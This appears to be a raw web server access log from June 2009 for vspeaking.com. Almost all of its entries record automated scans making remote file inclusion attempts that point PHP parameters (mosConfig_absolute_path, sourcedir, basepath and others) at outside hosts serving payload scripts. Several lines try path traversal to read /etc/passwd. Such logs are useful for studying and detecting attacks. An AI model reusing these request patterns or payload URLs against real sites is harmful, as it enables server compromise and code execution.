85.214.78.119 - - [29/Jun/2009:05:09:54 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.vspeaking.com"
85.214.78.119 - - [29/Jun/2009:05:09:57 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
85.214.78.119 - - [29/Jun/2009:05:09:58 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:05:13:22 -0700] "GET /logs/access.log/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "vspeaking.com"
80.247.76.181 - - [29/Jun/2009:05:13:22 -0700] "GET /logs/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "vspeaking.com"
80.247.76.181 - - [29/Jun/2009:05:13:22 -0700] "GET /?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
66.155.118.125 - - [29/Jun/2009:05:14:05 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:05:14:08 -0700] "GET /logs/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:05:14:08 -0700] "GET /?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
217.147.29.190 - - [29/Jun/2009:05:15:14 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
217.147.29.190 - - [29/Jun/2009:05:15:14 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
217.147.29.190 - - [29/Jun/2009:05:15:14 -0700] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.109.22.117 - - [29/Jun/2009:05:16:39 -0700] "GET /logs/access.log/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "vspeaking.com"
194.109.22.117 - - [29/Jun/2009:05:16:41 -0700] "GET /logs/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 2225 "-" "libwww-perl/5.816" "vspeaking.com"
194.109.22.117 - - [29/Jun/2009:05:16:43 -0700] "GET /?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.816" "vspeaking.com"
209.61.244.6 - - [29/Jun/2009:05:17:57 -0700] "GET /logs/components/com_events/events_config.php?mosConfig_absolute_path=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.vspeaking.com"
194.109.22.117 - - [29/Jun/2009:05:17:57 -0700] "GET /logs/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 2225 "-" "libwww-perl/5.816" "www.vspeaking.com"
194.109.22.117 - - [29/Jun/2009:05:17:57 -0700] "GET /?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.816" "www.vspeaking.com"
209.61.244.6 - - [29/Jun/2009:05:17:57 -0700] "GET /components/com_events/events_config.php?mosConfig_absolute_path=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:05:19:45 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:05:19:45 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:05:19:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
203.241.231.63 - - [29/Jun/2009:05:19:57 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
203.241.231.63 - - [29/Jun/2009:05:19:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
203.241.231.63 - - [29/Jun/2009:05:19:58 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.248.150.52 - - [29/Jun/2009:05:21:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.248.150.52 - - [29/Jun/2009:05:21:10 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.248.150.52 - - [29/Jun/2009:05:21:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:21:33 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:21:33 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:21:33 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:21:36 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:21:36 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:21:36 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:05:21:56 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:05:21:56 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:05:21:56 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
66.155.118.125 - - [29/Jun/2009:05:22:07 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
66.155.118.125 - - [29/Jun/2009:05:22:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
66.155.118.125 - - [29/Jun/2009:05:22:07 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:05:22:10 -0700] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:05:22:10 -0700] "GET /logs/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:05:22:11 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
77.221.130.22 - - [29/Jun/2009:05:22:46 -0700] "GET /?phpAds_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.22 - - [29/Jun/2009:05:22:46 -0700] "GET /logs/access_090105.log/?phpAds_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.22 - - [29/Jun/2009:05:22:46 -0700] "GET /logs/?phpAds_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.22 - - [29/Jun/2009:05:24:09 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.22 - - [29/Jun/2009:05:24:09 -0700] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.22 - - [29/Jun/2009:05:24:09 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.55.230.188 - - [29/Jun/2009:05:24:15 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:05:27:02 -0700] "GET /?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:05:27:02 -0700] "GET /logs/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:05:27:02 -0700] "GET /logs/access_090413.log/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.55.51.111 - - [29/Jun/2009:05:28:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
125.248.150.52 - - [29/Jun/2009:05:29:44 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
125.248.150.52 - - [29/Jun/2009:05:29:44 -0700] "GET /logs//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
125.248.150.52 - - [29/Jun/2009:05:31:47 -0700] "GET /logs/access.log//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:32:34 -0700] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:32:34 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:32:34 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:05:32:47 -0700] "GET /logs/phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:05:32:47 -0700] "GET /phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:33:34 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:33:34 -0700] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:33:34 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:33:52 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:33:52 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:33:52 -0700] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
119.93.90.155 - - [29/Jun/2009:05:34:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
119.93.90.155 - - [29/Jun/2009:05:34:30 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
119.93.90.155 - - [29/Jun/2009:05:34:30 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:05:35:16 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
119.93.90.155 - - [29/Jun/2009:05:39:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
119.93.90.155 - - [29/Jun/2009:05:39:21 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
119.93.90.155 - - [29/Jun/2009:05:39:25 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:41:36 -0700] "GET /logs/access.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:41:36 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:41:36 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:42:21 -0700] "GET /logs/access.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:42:21 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:42:21 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:48:41 -0700] "GET /logs/access.log/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:48:41 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:48:41 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:49:00 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:49:11 -0700] "GET /logs/access.log/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:49:11 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:49:11 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:49:17 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:49:17 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:49:48 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:49:48 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:49:48 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:50:43 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:50:43 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:50:43 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
150.214.108.8 - - [29/Jun/2009:05:51:17 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "vspeaking.com"
150.214.108.8 - - [29/Jun/2009:05:51:35 -0700] "GET /logs/access.log/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "vspeaking.com"
150.214.108.8 - - [29/Jun/2009:05:51:42 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "vspeaking.com"
213.251.168.157 - - [29/Jun/2009:05:52:12 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [29/Jun/2009:05:52:12 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [29/Jun/2009:05:53:48 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [29/Jun/2009:05:53:49 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [29/Jun/2009:05:54:18 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [29/Jun/2009:05:54:18 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:54:57 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:54:57 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
150.214.108.8 - - [29/Jun/2009:05:55:23 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:55:44 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [29/Jun/2009:05:55:44 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
150.214.108.8 - - [29/Jun/2009:05:55:49 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "www.vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:57:20 -0700] "GET /logs/access.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:57:20 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
174.133.150.130 - - [29/Jun/2009:05:57:21 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "vspeaking.com"
209.68.2.99 - - [29/Jun/2009:05:57:57 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:05:57:57 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:05:57:57 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:05:58:43 -0700] "GET /logs/access_090413.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
123.143.98.5 - - [29/Jun/2009:05:58:59 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
123.143.98.5 - - [29/Jun/2009:05:58:59 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
123.143.98.5 - - [29/Jun/2009:05:58:59 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:05:59:56 -0700] "GET /logs/access.log%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
